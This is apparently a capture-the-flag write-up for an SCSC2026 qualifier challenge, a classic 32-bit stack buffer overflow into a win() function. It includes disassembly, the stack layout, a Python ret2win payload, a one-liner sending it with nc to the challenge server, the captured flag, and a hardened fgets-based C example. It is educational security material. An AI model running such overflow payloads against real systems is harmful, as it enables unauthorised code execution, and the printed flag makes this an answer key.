SCSC2026 Quals - dzawin - Binary Exploitation Writeup

Category: Binary Exploitation
Server: nc 43.128.69.211 13005
Flag: scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}

Challenge Description

Classic buffer overflow with a win function.

Binary Analysis

$ file stack
stack: ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped

$ checksec --file=stack
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Key Functions

win() @ 0x080491c2

#include <stdio.h>
#include <stdlib.h>

/* Reads flag.txt and writes it byte by byte to stdout. */
void win() {
    FILE *fp = fopen("flag.txt", "r");
    if (!fp) {
        perror("Error while opening the file.");
        exit(1);
    }
    int c;
    while ((c = fgetc(fp)) != EOF) {
        putchar(c);
    }
}

vuln() @ 0x0804921f

vuln:
    push   ebp
    mov    ebp, esp
    sub    esp, 0x80              ; 128-byte buffer
    lea    eax, [ebp-0x80]        ; buffer address
    push   eax
    call   gets                   ; VULNERABLE!
    leave
    ret

Stack Layout

[    128 bytes buffer    ] <- ebp-0x80 (gets writes here)
[   4 bytes saved EBP    ] <- ebp
[  4 bytes return addr   ] <- ebp+4 (overwrite target)
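The defensive counterpart to the vuln() disassembly above, added here as an example (it is not part of the original write-up or the challenge binary): the same 128-byte frame, but read with a bounded fgets() loop instead of gets(). The function name read_line_bounded and the demo harness are assumptions; the input fed to it is a constructed 132 + 4 byte line shaped like the payload described below, delivered through fmemopen() so the code runs offline. The sentinel placed after the buffer stands in for the saved EBP and return address and must survive the read.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128   /* same frame size as the challenge's vuln() */

/* Hardened replacement for vuln()'s gets(buf) (hypothetical name):
 * reads at most size-1 bytes into buf, always NUL-terminates, strips the
 * trailing newline, and discards the remainder of an over-long line so the
 * excess can neither overflow buf nor be left in the stream for the next
 * read. Returns the number of bytes kept, or -1 on EOF/error. */
int read_line_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        if (size) buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';              /* complete line: drop the newline */
    } else {
        int c;                          /* line longer than buf: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Feeds a constructed 132-byte padding + 4-byte address + newline (the
 * shape of the write-up's payload) to read_line_bounded(). Returns 1 if
 * exactly BUF_SIZE-1 bytes were kept, the sentinel after the buffer is
 * untouched, and the over-long line was fully consumed; 0 otherwise. */
int demo_overflow_blocked(void) {
    struct { char buf[BUF_SIZE]; unsigned int sentinel; } frame;
    frame.sentinel = 0xdeadbeef;

    char input[140];                    /* constructed sample input */
    memset(input, 'A', 132);
    memcpy(input + 132, "\xc2\x91\x04\x08\n", 5);
    FILE *in = fmemopen(input, 137, "r");
    if (!in) return 0;

    int n = read_line_bounded(frame.buf, sizeof frame.buf, in);
    int next = fgetc(in);               /* EOF proves the line was drained */
    fclose(in);

    return n == BUF_SIZE - 1 && frame.sentinel == 0xdeadbeef && next == EOF;
}

int main(void) {
    printf("overflow blocked: %s\n", demo_overflow_blocked() ? "yes" : "no");
    return 0;
}
```

With gets() the bytes past offset 128 land on the saved EBP and return address; with the bounded read the frame receives 127 bytes plus a terminator and the rest of the line is consumed, so a second read does not see the leftover address bytes either.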

Exploitation Strategy

  1. Fill 128-byte buffer with padding
  2. Overwrite 4-byte saved EBP with junk
  3. Overwrite return address with win() address (0x080491c2)

Total padding needed: 128 + 4 = 132 bytes

Exploit

#!/usr/bin/env python3
import struct
import sys

padding = b'A' * 132  # 128-byte buffer + 4-byte saved ebp
win_addr = struct.pack('<I', 0x080491c2)  # win() address, little-endian

payload = padding + win_addr
# Write the raw bytes: print(payload) would emit the repr text b'AAA...\xc2...'
# and misalign the return address. The newline terminates gets().
sys.stdout.buffer.write(payload + b'\n')

One-liner:

python3 -c "import struct,sys; sys.stdout.buffer.write(b'A'*132 + struct.pack('<I', 0x080491c2) + b'\n')" | nc 43.128.69.211 13005

Output

scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}
https://blog.rei.my.id/posts/17/scsc2026-quals-dzawin-binary-exploitation-writeup/
Author: Reidho Satria
Published at: 2026-02-17
License: CC BY-NC-SA 4.0